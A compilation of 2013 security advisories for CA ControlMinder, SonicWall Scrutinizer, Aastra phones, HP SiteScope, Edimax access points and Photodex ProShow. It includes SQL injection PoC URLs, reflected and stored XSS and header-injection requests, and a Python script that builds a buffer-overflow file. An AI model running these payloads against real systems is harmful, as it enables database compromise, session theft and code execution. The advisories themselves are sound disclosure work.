CA20130213-01: Security Notice for CA ControlMinder
-BEGIN PGP SIGNED MESSAGE- CA20130213-01: Security Notice for CA ControlMinder Issued: February 13, 2013 CA Technologies Support is alerting customers to a potential risk with CA ControlMinder. A vulnerability exists that can allow a remote attacker to execute arbitrary code. CA has issued remediation to address the vulnerability. The vulnerability, CVE-2010-0738, occurs due to the default JBoss Application Server configuration not correctly enforcing authentication. A remote attacker can bypass authentication, which may result in arbitrary code execution and server compromise. This vulnerability only affects the server components. Risk Rating High Platform Windows Linux Solaris Affected Products CA ControlMinder for Windows 12.5, 12.6 (formerly CA Access Control) CA ControlMinder for Linux 12.5, 12.6 CA ControlMinder SAM 12.5, 12.6 CA ControlMinder Upgrade CA ControlMinder for Virtual Environments 2.0 Non-Affected Products CA ControlMinder for Windows 12.6 SP1 CA ControlMinder for Linux 12.6 SP1 CA ControlMinder SAM 12.6 SP1 CA ControlMinder Upgrade 12.6 SP1 CA ControlMinder for Virtual Environments 2.0 CR How to determine if the installation is affected If the installed version is prior to the version indicated in the Solution section, the installation may be vulnerable. To manually confirm whether the installation is vulnerable, use the following instructions: 1. Using a web browser, open the following location where location is the server name or IP address of the ControlMinder installation. http://location:18080/jmx-console 2. If the webpage is accessible, then the installation is vulnerable. Solution CA Technologies has issued the following remediation to address the vulnerability. All updates are available through the Download Center on the CA Technologies support website. For CA ControlMinder on all platforms, update as follows: CA ControlMinder for Windows 12.6: CA ControlMinder Premium Edition 12.6 SP1 Server Components for Windows DVD06135111E.iso CA ControlMinder for Linux 12.6: CA ControlMinder Premium Edition 12.6 SP1 Server Components for Linux DVD06134958E.iso CA ControlMinder SAM 12.6: CA ControlMinder Premium Edition 12.6 SP1 Server Components for Linux DVD06134958E.iso CA ControlMinder Upgrade 12.6: CA ControlMinder Premium Edition 12.6 SP1 Server Components for Linux DVD06134958E.iso CA ControlMinder for Virtual Environments 2.0: Access Control for Virtual Environments 2.0 CR DVD01091214E.iso CA ControlMinder 12.5 all releases on all platforms: Disable the JMX and Web Console servlets as described in TEC559568. Workaround Alternatively, the JMX and Web Console servlets may be disabled to remediate the vulnerability. See TEC559568 for instructions. References CVE-2010-0738 CA20130213-01: Security Notice for CA ControlMinder https://support.ca.com/irj/portal/anonymous/phpsbpldgpg Acknowledgement Sanehdeep Singh, Jainam Technologies Pvt. Ltd. Change History Version 1.0: Initial Release If additional information is required, please contact CA Technologies Support at http://support.ca.com/ If you discover a vulnerability in CA Technologies products, please report your findings to the CA Technologies Product Vulnerability Response Team: https://support.ca.com/irj/portal/anonymous/phpsbpldgpg Regards, Kevin Kotas Director, CA Technologies Product Vulnerability Response Team Copyright (c) 2013 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 11749. All other trademarks, trade names, service marks, and logos referenced herein belong to their respective companies. -BEGIN PGP SIGNATURE- Version: PGP Desktop 10.2.1 (Build 4940) Charset: utf-8 wsBVAwUBURvYMZI1FvIeMomJAQFa8QgAlGvNxaK3QWCw9z/Uzv7Jty4NAnZQ7V5n 44ZxK6sP4WN9gXklOYm9srnNCH65GdFNI6siqEi6SGeyzEww57V7mKUoZgdipQDn +CuRvj2ExtxZhWXSYkTW6aW0QYq5/wTT/SIcYwgfvyMWqajb5LM0dJXvFboTs05l pTjpl+Z+JudGB7ShlpQEVUrdTBmH3doYwIIoWNzUk+SjJq8d8sgh9PqLda+DrALt Njzsw+VKmG1usidHNJnvATMKNsJwQ2hxRQF0SbtvJsTd99ZetLbbdu1qun3fdmf1 Hbug/loFo6iBRwIkcLC3z87ph9cM0J6GsWa8rMzItmOZcGiu1rdd0A== =DZV/ -END PGP SIGNATURE-
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability
Title: == Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability Date: = 2013-02-13 References: === http://www.vulnerability-lab.com/get_content.php?id=789 #9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon) #10149: Create a common function to escape characters that can be used for SQL injection #10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped #10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped #10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped VL-ID: = 789 Common Vulnerability Scoring System: 7.3 Introduction: = Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments. (Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html ) Abstract: = The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application. Report-Timeline: 2012-12-05: Researcher Notification Coordination 2012-12-07: Vendor Notification 2013-01-08: Vendor Response/Feedback 2013-02-10: Vendor Fix/Patch 2013-02-11: Public Disclosure Status: Published Affected Products: == DELL Product: Sonicwall OEM Scrutinizer 9.5.2 Exploitation-Technique: === Remote Severity: = High Details: A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms. The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or gadget parameters. Exploitation requires no user interaction without privileged application user account. Successful exploitation of the remote sql vulnerability results in dbms application compromise. Vulnerable File(s): [+] fa_web.cgi Vulnerable Module(s): [+] gadget listing Vulnerable Parameter(s): [+] orderby [+] gadget Proof of Concept: = The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account and also without user interaction. For demonstration or reproduce ... PoC: http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]orderby=1cachebreaker=23_52_5_814-1%27 http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytesorderby=-1%27[SQL INJECTION VULNERABILITY!]cachebreaker=23_52_5_814-1%27 Solution: = 1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query 2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com -
Re: Aastra IP Telephone encrypted .tuz configuration file leakage
Vulnerability fixed in August 2012 release of anacrypt V1.04 encryption tool. Available on the www.aastra.com website. IP Phone Configuration File Encryption Tool - Microsoft Windows (Version 1.04, 08/2012, gz) (English, 45.78 KB) IP Phone Configuration File Encryption Tool - Linux 32 bit (Version 1.04, 08/2012, gz) (English, 9.18 KB) IP Phone Configuration File Encryption Tool - Linux 64 bit (Version 1.04, 08/2012, gz) (English, 9.89 KB)
[security bulletin] HPSBMU02815 SSRT100715 rev.5 - HP SiteScope SOAP Security Issues, Remote Disclosure of Information, Remote Code Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03489683 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03489683 Version: 5 HPSBMU02815 SSRT100715 rev.5 - HP SiteScope SOAP Security Issues, Remote Disclosure of Information, Remote Code Execution NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-02-13 Last Updated: 2013-02-13 Potential Security Impact: Remote disclosure of information, remote code execution Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP SiteScope. The vulnerabilities in SiteScope SOAP features could be remotely exploited to allow disclosure of information or code execution. References: CVE-2012-3259, ZDI-CAN-1461, SSRT100715 CVE-2012-3260, ZDI-CAN-1462, SSRT100716 CVE-2012-3261, ZDI-CAN-1463, SSRT100717 CVE-2012-3262, ZDI-CAN-1464, SSRT100718 CVE-2012-3263, ZDI-CAN-1465, SSRT100719 CVE-2012-3264, ZDI-CAN-1472,SSRT100720 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP SiteScope v10.14, v11.10, v11.11, v11.12, v11.20, for Windows, Linux and Solaris BACKGROUND CVSS 2.0 Base Metrics = ReferenceBase Vector Base Score CVE-2012-T3259 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3260 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3261 (AV:N/AC:L/Au:N/C:C/I:C/A:C ) 10.0 CVE-2012-3262 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3263 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3264 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 = Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with the TippingPoint Zero Day Initiative to report these vulnerabilities to security-al...@hp.com RESOLUTION HP has provided SiteScope update v11.13 to update HP SiteScope v11.10 to enable a resolution of this issue. HP has provided patches to v11.20 to enable a resolution of this issue. HP has provided patches to v10.14 to enable a resolution to this issue. This issue is resolved in Sitescope v11.21 Obtain SiteScope update v11.13 from HP Software Support Online at http://support.openview.hp.com/downloads.jsp . Obtain SiteScope patches for v11.20 from HP Software Support Online at http://support.openview.hp.com/downloads.jsp . Sitescope v11.20 version Patch Document Windows 32 and 64 bit KM00208435 SIS_00231 SiS 11.20 32 and 64-bit cumulative patch Windows 32 bit on 64 bit KM00208434 SIS_00232 SiS 11.20 32-bit on 64-bit OS cumulative patch Linux KM00208433 SIS_00233 SiS 11.20 cumulative Solaris KM00208432 SIS_00234 SiS 11.20 cumulative patch Sitescope v10.14 version Patch Document Windows 2003, 2008 KM00310020 sis 10.14 cumulative patch Linux KM00310011 sis10.14 cumulative patch Solaris KM00310971 sis 10.14 cumulative patch Note: to prevent the vulnerability after applying the update an administrator must disable the vulnerable SOAP API by adding the _disableOldAPIs=true property to the master.config file. However, for application comparability purposes, the default property is set to false to support integrations with old versions of BSM/BAC, which disables the security protection. HISTORY Version:1 (rev.1) - 19 September 2012 Initial release Version:2 (rev.2) - 19 September 2012 updated reference section Version:3 (rev.3) - 20 September 2012 updated Supported Software Versions section Version:4 (rev.4) - 31 October 2012 updated Supported Software Versions section Version:5 (rev.5) - 13 February 2013 updated Supported Software Versions section Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security
Multiple Vulnerabilities in Edimax EW-7206-APg and EW-7209APg
Device Name: EW-7206APg / EW-7209APg
Vendor: Edimax
Vulnerable Firmware Releases:
Device: EW-7206APg
Hardware Version Rev. A
Runtime Code Version v1.32
Runtime Code Version V1.33
Device: EW-7209APg
Hardware Version Rev. A
Runtime Code Version 1.21
Runtime Code Version 1.29
Device Description:
Acting as a bridge between the wired Ethernet and the 2.4GHz IEEE 802.11g/b
wireless LAN, this wireless LAN access point can let your wireless LAN client
stations access both the wired and the wireless network nodes.
EW-7206APg:
http://www.edimax.com/en/produce_detail.php?pl1_id=25pl2_id=134pl3_id=359pd_id=18
EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18pl1_id=1
Vulnerability Overview:
* URL Redirection:
Parameter: submit-url and wlan_url
http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de
http://192.168.178.175/goform/formWlanSetup?apMode=0band=2ssid=testchan=11macAddrValue=5C260A2BF03FwlanMacClone=0wlanMac=autoMacClone=norepeaterSSID=wlLinkMac1=wlLinkMac2=wlLinkMac3=wlLinkMac4=wlLinkMac5=wlLinkMac6=x=57y=20wlan-url=http://www.pwnd.pwnd
* reflected XSS:
Parameter: submit-url and wlan-url
Injecting scripts into the parameter submit-url or wlan-url reveals that this
parameter is not properly validated for malicious input.
Example Exploit:
http://192.168.178.175/goform/formWlanSetup?apMode=0band=2ssid=chan=11macAddrValue=wlanMacClone=0wlanMac=autoMacClone=norepeaterSSID=wlLinkMac1=wlLinkMac2=wlLinkMac3=wlLinkMac4=wlLinkMac5=wlLinkMac6=x=54y=12wlan-url=testscriptalert('XSSed')/scripttest
* stored XSS
* in System Utility - Domain Name:
= parameter: DomainName
Injecting scripts into the parameter DomainName reveals that this parameter is
not properly validated for malicious input. You need to be authenticated or you
have to find other methods for inserting the malicious JavaScript code.
http://192.168.178.175/goform/formTcpipSetup?oldpass=newpass=confpass=ip=192.168.178.175mask=255.255.255.0gateway=0.0.0.0dhcp=2DhcpGatewayIP=0.0.0.0DhcpNameServerIP=0.0.0.0dhcpRangeStart=192.168.178.100dhcpRangeEnd=192.168.178.200DomainName=;scriptalert(2)/scriptleaseTimeGet=94608leaseTime=94608B1.x=52B1.y=21submit-url=%2Fsysutility.aspipChanged=
* Stored XSS in wireless settings / basic settings - ESSID
- The injected script code gets executed within the device
information
Injecting scripts into the parameter ssid reveals that this parameter is not
properly validated for malicious input. You need to be authenticated or you
have to find other methods for inserting the malicious JavaScript code.
Example Request:
POST /goform/formWlanSetup HTTP/1.1
Host: 192.168.178.175
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.175/wlbasic.asp
Authorization: Basic xxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 351
apMode=0band=2ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281%29%3Echan=11macAddrValue=5C260A2BF03FwlanMacClone=0wlanMac=autoMacClone=norepeaterSSID=wlLinkMac1=wlLinkMac2=wlLinkMac3=wlLinkMac4=wlLinkMac5=wlLinkMac6=x=50y=20wlan-url=%2Fwlbasic.asp
* HTTP Header Injection:
Parameter: submit-url
Injecting code into the parameter submit-url mode reveals that this parameter
is not properly validated for malicious input and so it is possible to
manipulate the header information.
http://192.168.178.175/goform/formWirelessTbl?submit-url=e82f5%0d%0aNew%20Header:%20PWND
Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Sat Jan 1 14:06:23 2000
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://192.168.178.175/e82f5
New Header: PWND
snip
Solution
No known solution available.
Credits
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-009
Twitter: @s3cur1ty_de
Time Line:
September 2012 - discovered vulnerability
21.09.2012 - contacted vendor with vulnerability details
24.09.2012 - vendor responded that they will not provide a fix
14.02.2013 - public disclosure
= Advisory end =
[IA46] Photodex ProShow Producer v5.0.3297 ColorPickerProc() Memory Corruption
Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION --- Product:Photodex ProShow Producer Vendor URL: www.photodex.com Type: Improper Restriction of Operations within the Bounds of a Memory Buffer[CWE-119] Date found: 2013-02-14 Date published: 2013-02-14 CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P) CVE:- 2. CREDITS -- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED Photodex ProShow Producer v5.0.3297, older versions may be affected too. 4. VULNERABILITY DESCRIPTION A memory corruption vulnerability has been identified in Photodex ProShow Producer v5.0.3297. When opening a crafted style file (.pxs), the application loads the title value from the pxs file. The ColorPickerProc function does not properly validate the length of the string loaded from the title value from the pxs file before using it in the further application context, which leads to a memory corruption condition with possible code execution depending on the version of the operating system. Vulnerable function definition (all.dnt): __stdcall ColorPickerProc(x, x, x, x) An attacker needs to force the victim to open a crafted .pxs file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in denial-of-service conditions. 5. PROOF-OF-CONCEPT (Code / Exploit) The following generated string has to be inserted into a .pxs file to trigger the vulnerability on Windows XP SP3. #!/usr/bin/python file=poc.txt junk1=\x41 * 233 eip=\x42 * 4 junk2=\xCC * 100 poc=junk1 + eip + junk2 try: print ([*] Creating exploit file...\n); writeFile = open (file, w) writeFile.write( poc ) writeFile.close() print ([*] File successfully created!); except: print ([!] Error while creating file!); For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/46 6. SOLUTION --- None 7. REPORT TIMELINE -- 2013-02-14: Discovery of the vulnerability 2013-02-14: Full Disclosure because the vendor ignored all previous reports. 8. REFERENCES - http://security.inshell.net/advisory/46
